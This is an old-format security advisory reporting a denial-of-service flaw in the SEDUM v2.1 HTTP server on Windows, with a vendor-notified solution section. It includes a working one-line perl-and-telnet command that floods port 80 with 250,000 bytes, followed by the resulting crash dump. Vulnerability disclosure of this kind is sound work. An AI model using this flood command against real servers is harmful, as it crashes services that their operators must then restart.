COMMAND

    Sedum

SYSTEMS AFFECTED

    SEDUM v2.1 HTTPd

PROBLEM

    'slipy' found following.  SEDUM is a standard HTTP server designed
    for  Internet/Intranet  purposes.  SEDUM  support  parametric html
    files and  direct access  to databases  for a  simple and powerful
    network data management.   This software is  for the MS  operating
    system.

    SEDUM v2.1 is vulnerable to a nasty Denial of Service attack where
    it  can  be  flooded  with  useless  junk until the server crashes
    promptly.  Once it has been crashed it needs to be restarted again
    for  it  to  work  properly.   All  windows  versions  apear to be
    affected.

    Examples:

        echo `perl -e 'print "A" x 250000'` | telnet .com 80

        ^^ = Will cause the program to quit within seconds and display:

        EDUM caused an invalid page fault in
        module <unknown> at 0000:0111001e.
        Registers:
        EAX=0122968c CS=016f EIP=0111001e
        EFLGS=00010206 EBX=00000000 SS=0177
        ESP=006dfab0 EBP=006dfadc ECX=0111027c
        DS=0177 ESI=0048258c FS=7677 EDX=0111000c
        ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
        00 a0 2c 00 11 01 0c 00 11 01 00 02 00 00 01 00
        
        Stack dump:
        0042bbed 00000001 0048258c 0042ba02 00000000
        0048258c 004575fd 00000000  005b037c 012291d0
        005b03e4 00000001 004576cc 0000008c 000005b4
        00457751

SOLUTION

    Vendor has  been notified,  and waiting  for reply.   Judging from
    the  posts  about  the  directory  traversals  with  SEDUM and the
    authors response, don't expect a fix anytime soon.